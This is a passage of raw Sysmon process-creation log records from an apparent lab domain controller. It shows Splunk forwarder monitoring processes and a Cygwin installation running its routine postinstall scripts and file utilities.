Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058840Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:17.025{A8622C2F-544D-6078-B90C-00000000AE01}5096C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058828Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:57:16.360{A8622C2F-544C-6078-B80C-00000000AE01}4344C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058690Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:23.792{A8622C2F-5417-6078-B70C-00000000AE01}6968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058678Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:22.161{A8622C2F-5416-6078-B60C-00000000AE01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:21.339{A8622C2F-5415-6078-B50C-00000000AE01}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058655Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:20.456{A8622C2F-5414-6078-B40C-00000000AE01}4788C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058646Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:18.803{A8622C2F-5412-6078-B30C-00000000AE01}7016C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058635Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:17.936{A8622C2F-5411-6078-B20C-00000000AE01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058626Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:17.114{A8622C2F-5411-6078-B10C-00000000AE01}1028C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000058546Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.746{A8622C2F-5403-6078-AF0C-00000000AE01}4788C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/zp_man-db-update-index.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000058535Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.727{A8622C2F-5403-6078-AE0C-00000000AE01}7016C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5403-6078-AD0C-00000000AE01}6452C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/mintty.sh" 154100x800000000000000058525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.719{A8622C2F-5403-6078-AD0C-00000000AE01}6452C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/mintty.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-AB0C-00000000AE01}1372C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/mintty.sh" 154100x800000000000000058509Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.680{A8622C2F-5403-6078-AB0C-00000000AE01}1372C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/mintty.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000058498Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.667{A8622C2F-5403-6078-AA0C-00000000AE01}3420C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5403-6078-A90C-00000000AE01}6040C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash" 154100x800000000000000058488Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.660{A8622C2F-5403-6078-A90C-00000000AE01}6040C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-5403-6078-A50C-00000000AE01}4696C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash" 154100x800000000000000058477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.652{A8622C2F-5403-6078-A80C-00000000AE01}6492C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5403-6078-A70C-00000000AE01}6084C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash" 154100x800000000000000058467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.645{A8622C2F-5403-6078-A70C-00000000AE01}6084C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-5403-6078-A50C-00000000AE01}4696C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash" 154100x800000000000000058451Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.614{A8622C2F-5403-6078-A50C-00000000AE01}4696C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/man-db.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000058440Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.600{A8622C2F-5403-6078-A40C-00000000AE01}1100C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5403-6078-A30C-00000000AE01}5996C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058430Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.592{A8622C2F-5403-6078-A30C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-9B0C-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.584{A8622C2F-5403-6078-A20C-00000000AE01}5404C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5403-6078-A10C-00000000AE01}6364C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.576{A8622C2F-5403-6078-A10C-00000000AE01}6364C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-9B0C-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.567{A8622C2F-5403-6078-A00C-00000000AE01}6556C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5403-6078-9F0C-00000000AE01}3156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058388Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.560{A8622C2F-5403-6078-9F0C-00000000AE01}3156C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-9B0C-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.551{A8622C2F-5403-6078-9E0C-00000000AE01}3304C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5403-6078-9D0C-00000000AE01}3788C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.543{A8622C2F-5403-6078-9D0C-00000000AE01}3788C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5403-6078-9B0C-00000000AE01}5084C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh" 154100x800000000000000058351Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.504{A8622C2F-5403-6078-9B0C-00000000AE01}5084C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/openssl.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-53AA-6078-B907-00000000AE01}4420C:\Users\Administrator\Downloads\setup-x86_64.exe"C:\Users\Administrator\Downloads\setup-x86_64.exe" 154100x800000000000000058337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.466{A8622C2F-5403-6078-9A0C-00000000AE01}6552C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5403-6078-990C-00000000AE01}4412C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.458{A8622C2F-5403-6078-990C-00000000AE01}4412C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.450{A8622C2F-5403-6078-980C-00000000AE01}1800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058307Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.441{A8622C2F-5403-6078-970C-00000000AE01}4832C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058297Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.432{A8622C2F-5403-6078-960C-00000000AE01}4056C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058287Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.422{A8622C2F-5403-6078-950C-00000000AE01}3368C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5403-6078-940C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058277Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.414{A8622C2F-5403-6078-940C-00000000AE01}4696C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058267Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.406{A8622C2F-5403-6078-930C-00000000AE01}184C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5403-6078-920C-00000000AE01}5996C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.398{A8622C2F-5403-6078-920C-00000000AE01}5996C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058247Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:03.390{A8622C2F-5403-6078-910C-00000000AE01}6364C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5403-6078-900C-00000000AE01}6580C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000058237Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 